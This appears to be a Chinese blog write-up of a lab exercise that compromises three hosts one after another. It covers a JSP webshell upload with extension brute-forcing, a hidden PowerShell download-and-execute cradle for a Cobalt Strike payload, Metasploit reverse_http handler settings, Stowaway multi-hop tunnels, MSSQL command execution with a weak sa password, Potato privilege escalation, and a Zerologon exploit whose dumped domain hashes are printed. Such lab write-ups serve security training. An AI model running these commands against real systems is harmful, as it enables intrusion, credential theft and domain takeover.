靶场环境大概是这样的
外网主机上线
注册一个用户,登录后台后,找到个人资料功能点,有一个上传文件的功能点,F12找到路径(https://blog.csdn.net/qq_42321190/article/details/139424041参考的这个)
访问路径,进行上传文件操作
https://github.com/tennc/webshell/blob/master/www-7jyewu-cn/%E9%9D%9E%E5%B8%B8%E7%89%9B%E9%80%BC%E7%9A%84Jsp%E5%A4%A7%E9%A9%AC.jsp
将数据包后缀名进行反复上传
复制返回路径
寻找一下图片的路径,用BP抓包,抓不到浏览器访问的包,手动构造一下
10.10.0.123:8088/upload/20250825/tes_20250825103054099.jpg
修改后缀名为jsp,将后三位进行爆破
找到上传成功的jsp
访问
CS设置监听
生成攻击载荷
powershell.exe -nop -w hidden -c "IEX ((new-objectnet.webclient).downloadstring('http://ip:端口/a'))"
运行
上线CS,并提升权限
没有在域里
发现192.168.0.126/24网段
CS联动msf
msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 48012
CS执行
spawn msf //msf是监听器的名字
不出网第二台主机上线
搭建代理,使用Stowaway工具
在服务器上运行
./linux_x64_admin -l 8000 -s 123
将工具 上传到第一台主机192.168.0.126上
运行
windows_x64_agent.exe -c 服务器ip:8000 -s 123 --reconnect 8
然后创建隧道,我这报错是因为我已经创建了一个,让我把旧的停了
Proxifier创建规则
dddd进行扫描,扫描出mssql弱口令,sa/admin123
MDUT可以连接成功
激活组件后,可以执行命令,依旧有两个网卡,还有一层
也可以使用msf的auxiliary/admin/mssql/mssql_exec
先添加路由
run autoroute -p
run post/multi/manage/autoroute
设置/mssql_exec各个参数
msf exploit(windows/smb/psexec) > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(admin/mssql/mssql_exec) > set session 6
msf auxiliary(admin/mssql/mssql_exec) > set PASSWORD admin123
msf auxiliary(admin/mssql/mssql_exec) > set username sa
msf auxiliary(admin/mssql/mssql_exec) > set cmd ‘whoami’
msf auxiliary(admin/mssql/mssql_exec) > set RHOST 192.168.0.128
msf auxiliary(admin/mssql/mssql_exec) > options
运行以后报错
不知道什么原因,只能不设置session了
msf auxiliary(admin/mssql/mssql_exec) > unset SESSION
运行,又报错,报错原因是数据库名不对
set --clear DATABASE
最后使用系统默认库,master
msf auxiliary(admin/mssql/mssql_exec) > set DATABASE master
运行成功
中转上线第二台主机
生成exe,在目标上执行就行了,但是第二台不出网没办法直接下载
把exe上传到第一台主机上
使用MDUT访问第一台,下载到第二台
这里尝试了curl、wget等,不是因为主机本身没有工具就是因为权限不够,权限不够最后选择了这个路径C:\Users\MSSQLSERVER
powershell -c “iwr -Uri http://192.168.0.126:8088/upload/20250826/be_x64.exe -OutFile C:\Users\MSSQLSERVER\be_x64.exe”
运行
C:\Users\MSSQLSERVER\be_x64.exe
上线
提权
烂土豆运行whoami的结果是system
那直接运行中转的exe文件,直接system权限上线CS
不出网第三台主机上线
存在域环境,并抓取了hash等(通过CS的psexec横向失败,希望有懂得大佬提点我一下感谢感谢)
再搭建一层代理,为了访问到10.10.10.139
上传代理工具到10.10.10.136,还是通过刚刚的方式,要上传到/upload/20250826/路径下,这个截图有问题
powershell -c “iwr -Uri http://192.168.0.126:8088/upload/20250826/windows_x64_agent.exe -OutFile C:\Users\MSSQLSERVER\windows_x64_agent.exe”
在use 0上起一个监听,依次输入1和监听端口27850
在10.10.10.136上执行命令
C:\Users\MSSQLSERVER\windows_x64_agent.exe -c 192.168.0.126:27850 -s 123 –reconnect 8
二层代理搭建完成
在新加的代理上起一个socks隧道
Proxifier上再添加一个规则
然后我用dddd扫了一下,但是没有东西可以用
直接使用工具,工具地址 https://github.com/StarfireLab/AutoZerologon
上线第三台主机
python AutoZerologon.py 10.10.10.139 -scan
python AutoZerologon.py 10.10.10.139 -exp -user domain_admins
Administrator:500:aad3b435b51404eeaad3b435b51404ee:81220c729f6ccb63d782a77007550f74:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b20eb34f01eaa5ac8b6f80986c765d6d:::
sec123.cnk\cnk:1108:aad3b435b51404eeaad3b435b51404ee:83717c6c405937406f8e0a02a7215b16:::
AD01$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SERVER2012$:1109:aad3b435b51404eeaad3b435b51404ee:fd62e356f4c597184b47bf7781fece12:::
python AutoZerologon.py 10.10.10.139 -shell
有写的不对的地方请指正轻点喷
请登录后查看评论内容